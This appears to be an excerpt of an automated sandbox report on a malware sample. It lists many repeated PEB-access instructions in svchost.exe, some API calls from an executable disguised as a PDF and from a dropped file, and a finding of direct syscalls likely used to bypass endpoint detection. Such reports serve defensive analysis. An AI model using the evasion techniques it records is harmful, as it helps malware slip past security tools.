                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304500 mov eax, dword ptr fs:[00000030h]2_2_03304500
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326656A mov eax, dword ptr fs:[00000030h]2_2_0326656A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238550 mov eax, dword ptr fs:[00000030h]2_2_03238550
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B05A7 mov eax, dword ptr fs:[00000030h]2_2_032B05A7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032545B1 mov eax, dword ptr fs:[00000030h]2_2_032545B1
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov eax, dword ptr fs:[00000030h]2_2_03232582
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03232582 mov ecx, dword ptr fs:[00000030h]2_2_03232582
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264588 mov eax, dword ptr fs:[00000030h]2_2_03264588
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E59C mov eax, dword ptr fs:[00000030h]2_2_0326E59C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325E5E7 mov eax, dword ptr fs:[00000030h]2_2_0325E5E7
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032325E0 mov eax, dword ptr fs:[00000030h]2_2_032325E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326C5ED mov eax, dword ptr fs:[00000030h]2_2_0326C5ED
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E5CF mov eax, dword ptr fs:[00000030h]2_2_0326E5CF
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032365D0 mov eax, dword ptr fs:[00000030h]2_2_032365D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A5D0 mov eax, dword ptr fs:[00000030h]2_2_0326A5D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322E420 mov eax, dword ptr fs:[00000030h]2_2_0322E420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322C427 mov eax, dword ptr fs:[00000030h]2_2_0322C427
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B6420 mov eax, dword ptr fs:[00000030h]2_2_032B6420
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268402 mov eax, dword ptr fs:[00000030h]2_2_03268402
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC460 mov ecx, dword ptr fs:[00000030h]2_2_032BC460
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325A470 mov eax, dword ptr fs:[00000030h]2_2_0325A470
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326E443 mov eax, dword ptr fs:[00000030h]2_2_0326E443
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA456 mov eax, dword ptr fs:[00000030h]2_2_032EA456
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322645D mov eax, dword ptr fs:[00000030h]2_2_0322645D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325245A mov eax, dword ptr fs:[00000030h]2_2_0325245A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032364AB mov eax, dword ptr fs:[00000030h]2_2_032364AB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032644B0 mov ecx, dword ptr fs:[00000030h]2_2_032644B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BA4B0 mov eax, dword ptr fs:[00000030h]2_2_032BA4B0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032EA49A mov eax, dword ptr fs:[00000030h]2_2_032EA49A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032304E5 mov ecx, dword ptr fs:[00000030h]2_2_032304E5
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EB20 mov eax, dword ptr fs:[00000030h]2_2_0325EB20
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032F8B28 mov eax, dword ptr fs:[00000030h]2_2_032F8B28
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304B00 mov eax, dword ptr fs:[00000030h]2_2_03304B00
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AEB1D mov eax, dword ptr fs:[00000030h]2_2_032AEB1D
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0322CB7E mov eax, dword ptr fs:[00000030h]2_2_0322CB7E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4B4B mov eax, dword ptr fs:[00000030h]2_2_032E4B4B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03302B57 mov eax, dword ptr fs:[00000030h]2_2_03302B57
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C6B40 mov eax, dword ptr fs:[00000030h]2_2_032C6B40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FAB40 mov eax, dword ptr fs:[00000030h]2_2_032FAB40
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D8B42 mov eax, dword ptr fs:[00000030h]2_2_032D8B42
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228B50 mov eax, dword ptr fs:[00000030h]2_2_03228B50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEB50 mov eax, dword ptr fs:[00000030h]2_2_032DEB50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240BBE mov eax, dword ptr fs:[00000030h]2_2_03240BBE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032E4BB0 mov eax, dword ptr fs:[00000030h]2_2_032E4BB0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238BF0 mov eax, dword ptr fs:[00000030h]2_2_03238BF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EBFC mov eax, dword ptr fs:[00000030h]2_2_0325EBFC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCBF0 mov eax, dword ptr fs:[00000030h]2_2_032BCBF0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03250BCB mov eax, dword ptr fs:[00000030h]2_2_03250BCB
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230BCD mov eax, dword ptr fs:[00000030h]2_2_03230BCD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEBD0 mov eax, dword ptr fs:[00000030h]2_2_032DEBD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA24 mov eax, dword ptr fs:[00000030h]2_2_0326CA24
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0325EA2E mov eax, dword ptr fs:[00000030h]2_2_0325EA2E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03254A35 mov eax, dword ptr fs:[00000030h]2_2_03254A35
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BCA11 mov eax, dword ptr fs:[00000030h]2_2_032BCA11
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326CA6F mov eax, dword ptr fs:[00000030h]2_2_0326CA6F
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032DEA60 mov eax, dword ptr fs:[00000030h]2_2_032DEA60
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032ACA72 mov eax, dword ptr fs:[00000030h]2_2_032ACA72
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03236A50 mov eax, dword ptr fs:[00000030h]2_2_03236A50
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03240A5B mov eax, dword ptr fs:[00000030h]2_2_03240A5B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03238AA0 mov eax, dword ptr fs:[00000030h]2_2_03238AA0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286AA4 mov eax, dword ptr fs:[00000030h]2_2_03286AA4
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323EA80 mov eax, dword ptr fs:[00000030h]2_2_0323EA80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304A80 mov eax, dword ptr fs:[00000030h]2_2_03304A80
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03268A90 mov edx, dword ptr fs:[00000030h]2_2_03268A90
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326AAEE mov eax, dword ptr fs:[00000030h]2_2_0326AAEE
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03286ACC mov eax, dword ptr fs:[00000030h]2_2_03286ACC
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03230AD0 mov eax, dword ptr fs:[00000030h]2_2_03230AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03264AD0 mov eax, dword ptr fs:[00000030h]2_2_03264AD0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B892A mov eax, dword ptr fs:[00000030h]2_2_032B892A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C892B mov eax, dword ptr fs:[00000030h]2_2_032C892B
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032AE908 mov eax, dword ptr fs:[00000030h]2_2_032AE908
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC912 mov eax, dword ptr fs:[00000030h]2_2_032BC912
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03228918 mov eax, dword ptr fs:[00000030h]2_2_03228918
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03256962 mov eax, dword ptr fs:[00000030h]2_2_03256962
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov edx, dword ptr fs:[00000030h]2_2_0327096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0327096E mov eax, dword ptr fs:[00000030h]2_2_0327096E
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D4978 mov eax, dword ptr fs:[00000030h]2_2_032D4978
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC97C mov eax, dword ptr fs:[00000030h]2_2_032BC97C
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B0946 mov eax, dword ptr fs:[00000030h]2_2_032B0946
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03304940 mov eax, dword ptr fs:[00000030h]2_2_03304940
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032429A0 mov eax, dword ptr fs:[00000030h]2_2_032429A0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032309AD mov eax, dword ptr fs:[00000030h]2_2_032309AD
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov esi, dword ptr fs:[00000030h]2_2_032B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032B89B3 mov eax, dword ptr fs:[00000030h]2_2_032B89B3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BE9E0 mov eax, dword ptr fs:[00000030h]2_2_032BE9E0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032629F9 mov eax, dword ptr fs:[00000030h]2_2_032629F9
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032C69C0 mov eax, dword ptr fs:[00000030h]2_2_032C69C0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0323A9D0 mov eax, dword ptr fs:[00000030h]2_2_0323A9D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032649D0 mov eax, dword ptr fs:[00000030h]2_2_032649D0
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032FA9D3 mov eax, dword ptr fs:[00000030h]2_2_032FA9D3
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov ecx, dword ptr fs:[00000030h]2_2_03252835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03252835 mov eax, dword ptr fs:[00000030h]2_2_03252835
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0326A830 mov eax, dword ptr fs:[00000030h]2_2_0326A830
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032D483A mov eax, dword ptr fs:[00000030h]2_2_032D483A
                    Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_032BC810 mov eax, dword ptr fs:[00000030h]2_2_032BC810
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_0037A66C GetSecurityDescriptorDacl,_memset,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetProcessHeap,HeapAlloc,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_0037A66C
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_003681AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_003681AC
                    Source: C:\Users\user\Desktop\5674656777985-069688574654 pdf.exeCode function: 0_2_00368189 SetUnhandledExceptionFilter,0_2_00368189
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D08189 SetUnhandledExceptionFilter,1_2_00D08189
                    Source: C:\Users\user\AppData\Local\retrofit\cunila.exeCode function: 1_2_00D081AC SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_00D081AC

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Found direct / indirect Syscall (likely to bypass EDR)
                    Source: C:\Program Files (x86)\sTBuqAdIaUozjpXtjEAuwZfiAWuPNaaKrGLePbaBz\XzXxPWzavnqD.exeNtWriteVirtualMemory: Direct from: 0x76F0490CJump to behavior
